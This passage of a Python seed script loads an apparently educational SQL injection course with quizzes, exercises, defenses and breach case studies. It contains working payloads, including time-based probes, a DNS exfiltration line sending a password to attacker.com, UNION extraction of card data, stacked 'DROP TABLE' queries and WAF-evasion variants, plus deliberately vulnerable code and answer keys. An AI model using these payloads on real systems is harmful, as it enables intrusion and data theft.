    db.session.add(LessonStep(lesson_id=l4_5.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="You send this payload and the server takes exactly 5 seconds to respond:\\n```sql\\n' AND IF(1=1, SLEEP(5), 0)--\\n```\\nYou then send this and get an instant response:\\n```sql\\n' AND IF(1=2, SLEEP(5), 0)--\\n```\\nWhat can you conclude?", options=_opts(("A", "A) The server is slow"), ("B", "B) The field is vulnerable to time-based blind injection"), ("C", "C) The SLEEP function is not supported"), ("D", "D) The application detected and blocked the injection")), correct_answer="\"B\"", explanation="The first payload (true condition) caused a 5-second delay, while the second (false condition) returned instantly. This confirms you can control the database's execution time based on conditions — time-based blind injection is possible.", hints=_j([])))
    l4_6 = Lesson(module_id=m4.id, order_index=6, title="Out-of-Band (OOB) Injection", narrative="**Narrative**: *Out-of-Band injection is the rarest technique. Instead of extracting data through the same HTTP response, you make the database server send data to a server you control via DNS or HTTP.*\\n**When to use OOB**:\\n- When in-band and blind techniques don't work\\n- When the database has outbound network access\\n- When you need faster extraction than time-based", code_snippet="-- MySQL: DNS exfiltration\\n' UNION SELECT LOAD_FILE(CONCAT('\\\\\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\\\a'))--\\n\\n-- The database makes a DNS request to:\\n-- asecret.attacker.com\\n-- The attacker reads the password from their DNS logs!", code_language="sql", table_data=None)
    db.session.add(l4_6)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l4_6.id, order_index=1, kind="dnd", title="DRAG & DROP (Classification)", prompt="Classify each scenario into the correct SQL injection type:\\n**Scenarios**:\\n1. \"The page shows a database error with table names\" → **Error-based (In-Band)**\\n2. \"The page shows the same content but takes 10 seconds\" → **Time-based (Blind)**\\n3. \"The search results include data from a different table\" → **UNION-based (In-Band)**\\n4. \"The page shows 'Results found' or 'No results'\" → **Boolean-based (Blind)**\\n5. \"The database sends a DNS request to the attacker's server\" → **Out-of-Band**\\n**Student drags** each scenario into one of three bins: In-Band, Blind, Out-of-Band\\n---", options=_j([]), correct_answer="", explanation="", hints=_j([])))
    l4_7 = Lesson(module_id=m4.id, order_index=7, title="Decision Flowchart", narrative="**Interactive Decision Tree** (student clicks through):", code_snippet="START: Can you see query results on the page?\\n  │\\n  ├── YES → Can you use UNION to append queries?\\n  │          ├── YES → Use UNION-based injection\\n  │          └── NO  → Use Error-based injection\\n  │\\n  └── NO → Does the page behavior change based on true/false conditions?\\n            ├── YES → Use Boolean-based blind injection\\n            └── NO  → Does injecting SLEEP cause a time delay?\\n                       ├── YES → Use Time-based blind injection\\n                       └── NO  → Try Out-of-Band techniques", code_language="", table_data=None)
    db.session.add(l4_7)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l4_7.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE (Scenario)", prompt="You're testing a web application. You discover:\\n- Entering `'` in the search field returns a generic \"An error occurred\" page (no SQL details)\\n- Entering `' AND 1=1--` shows search results\\n- Entering `' AND 1=2--` shows \"No results found\"\\n- The `UNION SELECT` keyword is filtered/blocked\\nWhich injection technique should you use?", options=_opts(("A", "A) Error-based injection"), ("B", "B) UNION-based injection"), ("C", "C) Boolean-based blind injection"), ("D", "D) Time-based blind injection")), correct_answer="\"C\"", explanation="Error-based won't work (generic error page). UNION is blocked. But the page behaves differently for true (1=1) vs false (1=2) conditions. Boolean-based blind injection is the way to go.", hints=_j([])))

    # ── MODULE 05: Exploitation Techniques ──────────────────────────────────
    m5 = Module(order_index=5, title="Exploitation Techniques", description=DESCRIPTIONS.get(5, ""), icon=ICONS.get(5, "database"), difficulty="Advanced", estimated_minutes=30)
    db.session.add(m5)
    db.session.flush()
    l5_1 = Lesson(module_id=m5.id, order_index=1, title="The Attacker's Roadmap", narrative="**Narrative**: *A skilled attacker follows a systematic process. They don't just dump data randomly — they map the database first, then surgically extract what they want.*", code_snippet="Phase 1: RECONNAISSANCE\\n  │  Detect injection point\\n  │  Identify database type (MySQL, PostgreSQL, etc.)\\n  │\\nPhase 2: ENUMERATION  \\n  │  List all databases\\n  │  List all tables in target database\\n  │  List all columns in target table\\n  │\\nPhase 3: EXTRACTION\\n  │  Dump sensitive data (credentials, PII, etc.)\\n  │\\nPhase 4: ESCALATION (if possible)\\n  │  Read server files\\n  │  Write files to server\\n  │  Execute OS commands", code_language="", table_data=None)
    db.session.add(l5_1)
    db.session.flush()
    l5_2 = Lesson(module_id=m5.id, order_index=2, title="Identifying the Database (Fingerprinting)", narrative="**Narrative**: *Different databases have different syntax, functions, and metadata tables. The first step is figuring out which database you're dealing with.*\\n**Fingerprinting Techniques**:", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l5_2)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l5_2.id, order_index=1, kind="predict", title="PREDICT THE OUTPUT", prompt="An attacker runs these tests against an unknown database:\\n```\\nTest 1: ' UNION SELECT @@version--     → Returns \"13.4.0\"\\nTest 2: ' UNION SELECT version()--     → Returns \"PostgreSQL 13.4 on x86_64-pc-linux-gnu\"\\nTest 3: ' || 'test                     → Returns \"test\" (concatenation worked)\\n```\\nWhich database is the application using?", options=_opts(("A", "A) MySQL"), ("B", "B) PostgreSQL"), ("C", "C) SQL Server"), ("D", "D) Oracle")), correct_answer="B) PostgreSQL", explanation="`version()` returning \"PostgreSQL\" is the giveaway. MySQL also supports `@@version`, but the `||` concatenation and the explicit \"PostgreSQL\" in the version string confirm it.", hints=_j([])))
    l5_3 = Lesson(module_id=m5.id, order_index=3, title="Enumerating with information_schema", narrative="**Narrative**: *Most modern databases have a special metadata database called `information_schema`. It's like a phone book for the database — it lists every database, table, and column. Attackers love it.*\\n**Step-by-step enumeration (MySQL example)**:\\n**Step 1 — List all databases**:\\n**Step 2 — List tables in target database**:\\n**Step 3 — List columns in target table**:\\n**Step 4 — Extract data**:\\n💀 Full credit card details extracted.", code_snippet="' UNION SELECT card_number, expiry, cvv FROM credit_cards--", code_language="sql", table_data=None)
    db.session.add(l5_3)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l5_3.id, order_index=1, kind="sandbox", title="SANDBOX (Guided Enumeration)", prompt="", options=_j([]), correct_answer="", explanation="", hints=_j([])))
    l5_4 = Lesson(module_id=m5.id, order_index=4, title="Extracting Data with Subqueries", narrative="**Narrative**: *Sometimes UNION doesn't work (filtered, wrong column count, etc.). Subqueries offer an alternative path.*\\n**Technique — Data in WHERE clause**:", code_snippet="-- Extract the admin password using a subquery in a boolean context\\n' AND (SELECT password FROM users WHERE username = 'admin') = 'known_value'--\\n\\n-- Or extract via error (if error messages are displayed):\\n' AND 1 = CONVERT(int, (SELECT TOP 1 password FROM users))--\\n-- Error: Conversion failed when converting 'admin_p@ss' to int", code_language="sql", table_data=None)
    db.session.add(l5_4)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l5_4.id, order_index=1, kind="fitb", title="FILL IN THE BLANK", prompt="Complete the subquery to extract the admin's email address via error-based injection (SQL Server):\\n```sql\\n' AND 1 = CONVERT(int, (____________________________))--\\n```\\n**Expected Answer**: `SELECT TOP 1 email FROM users WHERE username = 'admin'`\\n**Acceptable variations**: `SELECT email FROM users WHERE username='admin'`", options=_j([]), correct_answer=_j([""]), explanation="*`CONVERT(int, ...)` tries to convert the email string to an integer, which fails and includes the email value in the error message.*\\n---", hints=_j([])))
    l5_5 = Lesson(module_id=m5.id, order_index=5, title="Second-Order SQL Injection", narrative="**Narrative**: *Most SQL injection is \"first-order\" — the malicious input is used immediately. But what about second-order injection, where the payload is **stored** and triggered later?*\\n**Scenario**:\\n**💡 Key Insight**: *The registration was safe. The vulnerability was in a completely different function that trusted data already in the database. This is why defense must be applied at **every** query, not just at input time.*", code_snippet="Step 1: Attacker REGISTERS with username: admin'--\\n        → The app safely uses parameterized queries for INSERT\\n        → Username 'admin'--' is stored in the database\\n\\nStep 2: Attacker changes their password\\n        → The app builds a query using the STORED username:\\n        \\n        query = f\"UPDATE users SET password = '{new_pass}' WHERE username = '{stored_username}'\"\\n        \\n        Becomes:\\n        UPDATE users SET password = 'hacked123' WHERE username = 'admin'--'\\n        \\n        → The admin's password is changed to 'hacked123'!", code_language="", table_data=None)
    db.session.add(l5_5)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l5_5.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="A developer argues: \"We're safe from SQL injection because we validate all user input before storing it in the database.\"\\nWhy might this be insufficient?", options=_opts(("A", "A) Input validation can always be bypassed"), ("B", "B) Stored data might be used unsafely in later queries (second-order injection)"), ("C", "C) Databases don't support input validation"), ("D", "D) Validation only works for numbers, not strings")), correct_answer="\"B\"", explanation="Even if data is validated and safely stored, a different part of the application might retrieve that data and use it in an unsafe query later. Defense must happen at the query level (parameterized queries), not just at the input level.", hints=_j([])))
    l5_6 = Lesson(module_id=m5.id, order_index=6, title="Advanced: Stacked Queries", narrative="**Narrative**: *Some databases allow you to execute multiple queries separated by a semicolon. This opens the door to destructive attacks.*\\n**Support by database**:", code_snippet="-- Normal query:\\nSELECT * FROM products WHERE id = 1\\n\\n-- Stacked query injection:\\nSELECT * FROM products WHERE id = 1; DROP TABLE users; --\\n\\n-- Two queries execute:\\n-- 1. SELECT * FROM products WHERE id = 1\\n-- 2. DROP TABLE users   ← 💀 ENTIRE USER TABLE DELETED", code_language="sql", table_data=None)
    db.session.add(l5_6)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l5_6.id, order_index=1, kind="spot", title="SPOT THE VULNERABILITY", prompt="This Node.js application has multiple SQL injection vulnerabilities. Find ALL vulnerable lines:\\n```javascript\\n// Line 1: const express = require('express');\\n// Line 2: const db = require('./database');\\n// Line 3:\\n// Line 4: app.get('/search', (req, res) => {\\n// Line 5:   const term = req.query.q;\\n// Line 6:   const query = `SELECT * FROM products WHERE name LIKE '%${term}%'`;\\n// Line 7:   db.query(query, (err, results) => {\\n// Line 8:     res.json(results);\\n// Line 9:   });\\n// Line 10: });\\n// Line 11:\\n// Line 12: app.get('/user/:id', (req, res) => {\\n// Line 13:   const userId = req.params.id;\\n// Line 14:   const query = `SELECT * FROM users WHERE id = ${userId}`;\\n// Line 15:   db.query(query, (err, results) => {\\n// Line 16:     res.json(results);\\n// Line 17:   });\\n// Line 18: });\\n```", options=_j([]), correct_answer="Lines 6 and 14", explanation="*Both lines use template literals to embed user input directly into SQL strings. Even though Line 14 looks like it expects a number (user ID), there's nothing stopping an attacker from sending `1 UNION SELECT * FROM users--` as the URL parameter.*\\n---", hints=_j([])))
    l5_7 = Lesson(module_id=m5.id, order_index=7, title="Capstone: Full Attack Simulation", narrative="", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l5_7)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l5_7.id, order_index=1, kind="sandbox", title="SANDBOX (Free-form)", prompt="", options=_j([]), correct_answer="", explanation="", hints=_j([])))

    # ── MODULE 06: Defense & Prevention ──────────────────────────────────
    m6 = Module(order_index=6, title="Defense & Prevention", description=DESCRIPTIONS.get(6, ""), icon=ICONS.get(6, "database"), difficulty="Intermediate", estimated_minutes=25)
    db.session.add(m6)
    db.session.flush()
    l6_1 = Lesson(module_id=m6.id, order_index=1, title="The Defense Pyramid", narrative="**Narrative**: *Defense against SQL injection isn't a single fix — it's a layered strategy. Think of it as a pyramid, where each layer catches what the previous one misses.*\\n**Interactive Visual**: Pyramid diagram (click each layer)\\n**⚠️ Critical**: Parameterized queries are the **only** reliable defense. All other layers are supplements, not replacements.", code_snippet="                    ╱╲\\n                   ╱  ╲\\n                  ╱ WAF ╲         ← Layer 4: Web Application Firewall\\n                 ╱────────╲\\n                ╱ Least    ╲      ← Layer 3: Principle of Least Privilege\\n               ╱ Privilege  ╲\\n              ╱──────────────╲\\n             ╱ Input Validation╲  ← Layer 2: Validate & Sanitize Input\\n            ╱──────────────────╲\\n           ╱  PARAMETERIZED     ╲ ← Layer 1: THE FOUNDATION\\n          ╱   QUERIES            ╲\\n         ╱════════════════════════╲", code_language="", table_data=None)
    db.session.add(l6_1)
    db.session.flush()
    l6_2 = Lesson(module_id=m6.id, order_index=2, title="Layer 1: Parameterized Queries (Prepared Statements)", narrative="**Narrative**: *This is the silver bullet. Parameterized queries separate **code** from **data**. The database engine knows exactly which parts are SQL commands and which parts are user values. Injection becomes impossible.*\\n**How it works**:\\n**Implementation in 5 languages**:", code_snippet="// ❌ VULNERABLE\\nstring query = $\"SELECT * FROM users WHERE username = '{username}'\";\\nSqlCommand cmd = new SqlCommand(query, conn);\\n\\n// ✅ SAFE — Parameterized\\nstring query = \"SELECT * FROM users WHERE username = @username\";\\nSqlCommand cmd = new SqlCommand(query, conn);\\ncmd.Parameters.AddWithValue(\"@username\", username);", code_language="csharp", table_data=None)
    db.session.add(l6_2)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l6_2.id, order_index=1, kind="fix", title="FIX THE CODE", prompt="This Python Flask endpoint is vulnerable. Rewrite it to use parameterized queries:\\n```python\\n@app.route('/search')\\ndef search():\\nterm = request.args.get('q')\\nquery = f\"SELECT * FROM products WHERE name LIKE '%{term}%'\"\\nresults = db.execute(query).fetchall()\\nreturn render_template('results.html', products=results)\\n```\\n**Expected Answer**:\\n```python\\n@app.route('/search')\\ndef search():\\nterm = request.args.get('q')\\nquery = \"SELECT * FROM products WHERE name LIKE ?\"\\nresults = db.execute(query, ('%' + term + '%',)).fetchall()\\nreturn render_template('results.html', products=results)\\n```\\n**Key point**: The `%` wildcards are added to the parameter value, not to the query string. The `?` placeholder ensures the search term is always treated as data.\\n**Common mistake**: Putting `%?%` in the query — this doesn't work because `?` must be a standalone placeholder.\\n---", options=_j([]), correct_answer="", explanation="", hints=_j([])))
    db.session.add(LessonStep(lesson_id=l6_2.id, order_index=2, kind="spot", title="SPOT THE VULNERABILITY", prompt="A developer claims this code is safe because it uses parameterized queries. Is it actually safe?\\n```python\\ntable_name = request.args.get('table')\\nquery = f\"SELECT * FROM {table_name} WHERE id = ?\"\\ncursor.execute(query, (user_id,))\\n```", options=_j([]), correct_answer="NOT SAFE ❌", explanation="*The `id` parameter is properly parameterized, but the **table name** is still injected via string formatting! You cannot parameterize table names, column names, or SQL keywords — only values. An attacker could set `table_name` to `users; DROP TABLE products;--`.*\\n**Fix**: Use a whitelist for table names:\\n```python\\nALLOWED_TABLES = {'products', 'categories', 'reviews'}\\ntable_name = request.args.get('table')\\nif table_name not in ALLOWED_TABLES:\\nabort(400)\\nquery = f\"SELECT * FROM {table_name} WHERE id = ?\"\\ncursor.execute(query, (user_id,))\\n```\\n---", hints=_j([])))
    l6_3 = Lesson(module_id=m6.id, order_index=3, title="Layer 2: Input Validation & Sanitization", narrative="**Narrative**: *Parameterized queries are your main defense, but input validation adds another layer. Validate inputs to ensure they match expected formats.*\\n**Types of validation**:\\n**⚠️ Important**: Input validation alone is **NOT sufficient** defense against SQL injection. It should always be used **alongside** parameterized queries, never as a replacement.", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l6_3)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l6_3.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="A developer adds this validation before using the input in a SQL query:\\n```python\\ndef sanitize(input_string):\\nreturn input_string.replace(\"'\", \"''\")  # Escape single quotes\\n```\\nIs this a reliable defense against SQL injection?", options=_opts(("A", "A) Yes, escaping quotes prevents all SQL injection"), ("B", "B) No — it can be bypassed in certain character encodings and doesn't handle all injection types"), ("C", "C) Yes, but only for MySQL databases"), ("D", "D) No — the function should also escape semicolons")), correct_answer="\"B\"", explanation="Manual escaping is fragile. It can be bypassed via:", hints=_j([])))
    l6_4 = Lesson(module_id=m6.id, order_index=4, title="Layer 3: Principle of Least Privilege", narrative="**Narrative**: *Even if an attacker succeeds in injecting SQL, you can limit the damage by restricting what the database account can do.*\\n**Bad practice**:\\n**Good practice**:\\n**Impact comparison**:", code_snippet="-- Create a restricted account for the web app\\nCREATE USER 'webapp_readonly'@'localhost' IDENTIFIED BY 'strong_password';\\n\\n-- Grant ONLY what's needed\\nGRANT SELECT ON webapp_db.products TO 'webapp_readonly'@'localhost';\\nGRANT SELECT ON webapp_db.categories TO 'webapp_readonly'@'localhost';\\nGRANT SELECT, INSERT ON webapp_db.orders TO 'webapp_readonly'@'localhost';\\n\\n-- Explicitly deny dangerous operations\\n-- No DELETE, DROP, FILE, EXECUTE privileges", code_language="sql", table_data=None)
    db.session.add(l6_4)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l6_4.id, order_index=1, kind="dnd", title="DRAG & DROP (Permission Assignment)", prompt="Match each web application function to the **minimum** database permissions it needs:\\n| Application Function | Required Permission |\\n|---------------------|-------------------|\\n| Product search page | `SELECT` on products |\\n| User registration | `INSERT` on users |\\n| Order placement | `SELECT` on products + `INSERT` on orders |\\n| Admin delete user | `DELETE` on users |\\n| Profile update | `UPDATE` on users |\\n**Student drags** permission sets to each function.\\n---", options=_j([]), correct_answer="", explanation="", hints=_j([])))
    l6_5 = Lesson(module_id=m6.id, order_index=5, title="Layer 4: Web Application Firewall (WAF)", narrative="**Narrative**: *A WAF sits between users and your application, analyzing HTTP requests for malicious patterns. It can block common SQL injection payloads before they reach your code.*\\n**How a WAF works**:\\n**Popular WAFs**: ModSecurity, AWS WAF, Cloudflare WAF, Imperva\\n**⚠️ Limitation**: WAFs can be bypassed with advanced encoding, comment insertion, or case manipulation:\\n**This is why WAFs are Layer 4 (supplement), not Layer 1 (foundation).**", code_snippet="-- Standard (blocked by WAF):\\n' UNION SELECT password FROM users--\\n\\n-- Evasion attempt (may bypass WAF):\\n' uNiOn SeLeCt password FrOm users--\\n' /*!UNION*/ /*!SELECT*/ password FROM users--\\n' UNION%0aSELECT password FROM users--", code_language="sql", table_data=None)
    db.session.add(l6_5)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l6_5.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="A company relies solely on a WAF to protect against SQL injection and doesn't use parameterized queries. An attacker discovers a bypass for their WAF's rules. What happens?", options=_opts(("A", "A) The database's built-in security will still prevent the injection"), ("B", "B) The application is fully compromised because there are no other defenses"), ("C", "C) The operating system firewall will catch the injection"), ("D", "D) The WAF will learn and adapt to block the bypass")), correct_answer="\"B\"", explanation="Without parameterized queries as the foundation, bypassing the WAF means the application is fully exposed. This is why defense-in-depth is essential — no single layer should be your only protection.", hints=_j([])))
    l6_6 = Lesson(module_id=m6.id, order_index=6, title="Bonus Layer: ORM & Stored Procedures", narrative="**Narrative**: *Two additional tools in your defense arsenal:*\\n**⚠️ Caveat**: ORMs and stored procedures can still be vulnerable if you use raw SQL features within them:", code_snippet="# ❌ Still vulnerable — raw SQL within ORM\\nUser.query.filter(text(f\"name = '{name}'\"))\\n\\n# ✅ Safe — using ORM's built-in filtering\\nUser.query.filter_by(name=name)", code_language="python", table_data=None)
    db.session.add(l6_6)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l6_6.id, order_index=1, kind="fix", title="FIX THE CODE (Comprehensive)", prompt="This Express.js (Node.js) API has three SQL injection vulnerabilities. Fix all of them:\\n**Vulnerable Code**:\\n```javascript\\napp.get('/api/products', (req, res) => {\\nconst search = req.query.q;\\nconst sort = req.query.sort;\\nconst limit = req.query.limit;\\nconst query = `SELECT * FROM products\\nWHERE name LIKE '%${search}%'\\nORDER BY ${sort}\\nLIMIT ${limit}`;\\ndb.query(query, (err, results) => {\\nres.json(results);\\n});\\n});\\n```\\n**Expected Answer**:\\n```javascript\\nconst ALLOWED_SORT_COLUMNS = ['name', 'price', 'created_at', 'rating'];\\napp.get('/api/products', (req, res) => {\\nconst search = req.query.q;\\nconst sort = req.query.sort;\\nconst limit = parseInt(req.query.limit) || 20;\\n// Whitelist sort column\\nconst sortColumn = ALLOWED_SORT_COLUMNS.includes(sort) ? sort : 'name';\\n// Parameterize search, validate limit, whitelist sort\\nconst query = `SELECT * FROM products\\nWHERE name LIKE ?\\nORDER BY ${sortColumn}\\nLIMIT ?`;\\ndb.query(query, [`%${search}%`, limit], (err, results) => {\\nres.json(results);\\n});\\n});\\n```\\n**Fixes applied**:\\n1. **search** → Parameterized with `?`\\n2. **sort** → Whitelisted against allowed column names\\n3. **limit** → Parsed as integer (type validation) + parameterized\\n---", options=_j([]), correct_answer="", explanation="", hints=_j([])))
    l6_7 = Lesson(module_id=m6.id, order_index=7, title="The Defense Checklist", narrative="**Interactive Checklist** (student checks items they would implement):", code_snippet="✅ MUST-HAVE (Non-negotiable)\\n  □ Use parameterized queries for ALL database interactions\\n  □ Never concatenate user input into SQL strings\\n  □ Use least-privilege database accounts\\n\\n✅ SHOULD-HAVE (Strongly recommended)\\n  □ Validate all inputs (type, length, format)\\n  □ Whitelist allowed values for table/column names\\n  □ Use an ORM with proper configuration\\n  □ Disable detailed error messages in production\\n\\n✅ NICE-TO-HAVE (Additional protection)\\n  □ Deploy a WAF with SQL injection rules\\n  □ Implement logging and monitoring for suspicious queries\\n  □ Use stored procedures for complex operations\\n  □ Regular security audits and penetration testing\\n  □ Keep database software up to date", code_language="", table_data=None)
    db.session.add(l6_7)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l6_7.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE (Final Scenario)", prompt="You're reviewing a Python web application. Which combination of defenses provides the STRONGEST protection?", options=_opts(("A", "A) WAF + Input validation + Manual quote escaping"), ("B", "B) Parameterized queries + Least privilege + Input validation + WAF"), ("C", "C) Stored procedures only"), ("D", "D) Input validation + Output encoding + HTTPS")), correct_answer="\"B\"", explanation="This is proper defense-in-depth:", hints=_j([])))

    # ── MODULE 07: Real-World Cases & Final Challenge ──────────────────────────────────
    m7 = Module(order_index=7, title="Real-World Cases & Final Challenge", description=DESCRIPTIONS.get(7, ""), icon=ICONS.get(7, "database"), difficulty="Advanced", estimated_minutes=20)
    db.session.add(m7)
    db.session.flush()
    l7_1 = Lesson(module_id=m7.id, order_index=1, title="Case Study: Heartland Payment Systems (2008)", narrative="**Narrative**: *In 2008, Heartland Payment Systems — one of the largest credit card processors in the US — suffered the biggest data breach in history at the time.*\\n**The Facts**:\\n**Attack Chain**:\\n**Lesson**: A single SQL injection vulnerability in a web form led to the largest credit card breach in history. The attacker didn't stop at the database — SQL injection was just the **entry point**.", code_snippet="1. SQL injection on public website\\n   ↓\\n2. Gained access to internal network\\n   ↓\\n3. Installed packet sniffing malware\\n   ↓\\n4. Intercepted credit card data in transit\\n   ↓\\n5. 130 million cards compromised", code_language="", table_data=None)
    db.session.add(l7_1)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l7_1.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="In the Heartland breach, SQL injection was used to:", options=_opts(("A", "A) Directly steal 130 million credit card numbers from the database"), ("B", "B) Gain initial access to the network, which led to further exploitation"), ("C", "C) Delete all transaction records"), ("D", "D) Redirect payments to the attacker's account")), correct_answer="\"B\"", explanation="SQL injection was the entry point. The actual card data was stolen through malware installed after the attacker pivoted to the internal network. This shows how SQL injection can be the first domino in a chain of devastating attacks.", hints=_j([])))
    l7_2 = Lesson(module_id=m7.id, order_index=2, title="Case Study: Sony Pictures (2011)", narrative="**Narrative**: *In 2011, the hacktivist group LulzSec compromised Sony Pictures using one of the simplest SQL injection techniques.*\\n**The Facts**:\\n**LulzSec's public statement** (paraphrased):\\n> *\"We used a simple SQL injection — one of the most basic and well-known vulnerabilities. The fact that Sony was storing passwords in plaintext shows a complete disregard for security.\"*\\n**Double failure**:\\n1. **Vulnerable to SQL injection** — a preventable bug\\n2. **Plaintext passwords** — no hashing or encryption", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l7_2)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l7_2.id, order_index=1, kind="predict", title="PREDICT THE OUTPUT", prompt="An attacker extracts data from Sony's database and finds:\\n```\\nusername: john_doe\\npassword: ilovesony123\\n```\\nWhat critical security practice did Sony fail to implement?", options=_opts(("A", "A) SSL/TLS encryption"), ("B", "B) Password hashing (storing passwords as irreversible hashes)"), ("C", "C) Two-factor authentication"), ("D", "D) Input validation")), correct_answer="B) Password hashing (storing passwords as irreversible hashes)", explanation="Passwords should **never** be stored in plaintext. They should be hashed using a strong algorithm like bcrypt, scrypt, or Argon2. Even if an attacker steals the database, hashed passwords are extremely difficult to reverse.", hints=_j([])))
    l7_3 = Lesson(module_id=m7.id, order_index=3, title="Case Study: TalkTalk Telecom (2015)", narrative="**Narrative**: *British telecom company TalkTalk was breached by a 15-year-old using SQL injection. Yes, fifteen.*\\n**The Facts**:\\n**The lesson**: The attacker wasn't a sophisticated nation-state hacker. They used **freely available tools** (like sqlmap) against a well-known vulnerability. The company's failure to implement basic security practices — specifically parameterized queries — cost them over $100 million.", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l7_3)
    db.session.flush()
    l7_4 = Lesson(module_id=m7.id, order_index=4, title="Impact Analysis Summary", narrative="**Interactive Comparison Table**:\\n**💡 Key Insight**: *These aren't obscure companies — they're industry giants. SQL injection remains in the OWASP Top 10 because organizations repeatedly fail to implement the basic defenses we covered in Module 06.*", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l7_4)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l7_4.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="What common factor do all these breaches share?", options=_opts(("A", "A) They all used the same SQL injection technique"), ("B", "B) They were all caused by zero-day vulnerabilities"), ("C", "C) They were all preventable with well-known security practices"), ("D", "D) They all targeted the same type of database")), correct_answer="\"C\"", explanation="Every single one of these breaches could have been prevented with parameterized queries — a technique that has been known and recommended for over 20 years. These weren't sophisticated attacks exploiting unknown vulnerabilities; they exploited basic, well-documented flaws.", hints=_j([])))
    l7_5 = Lesson(module_id=m7.id, order_index=5, title="Final Challenge: Comprehensive Assessment", narrative="", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l7_5)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l7_5.id, order_index=1, kind="fitb", title="THE GAUNTLET", prompt="", options=_opts(("A", "A) A WAF alone is sufficient protection"), ("B", "B) Input validation alone is sufficient protection"), ("C", "C) Parameterized queries alone are sufficient, but defense-in-depth is better"), ("D", "D) Using HTTPS prevents SQL injection")), correct_answer=_j(["C) Parameterized queries alone are sufficient, but defense-in-depth is better"]), explanation="Parameterized queries are the **only** technique that truly prevents SQL injection. However, combining them with input validation, least privilege, and WAF monitoring provides the strongest overall defense.", hints=_j([])))

    db.session.commit()
    print(f"Seeded {Module.query.count()} modules, {Lesson.query.count()} lessons, {LessonStep.query.count()} steps.")

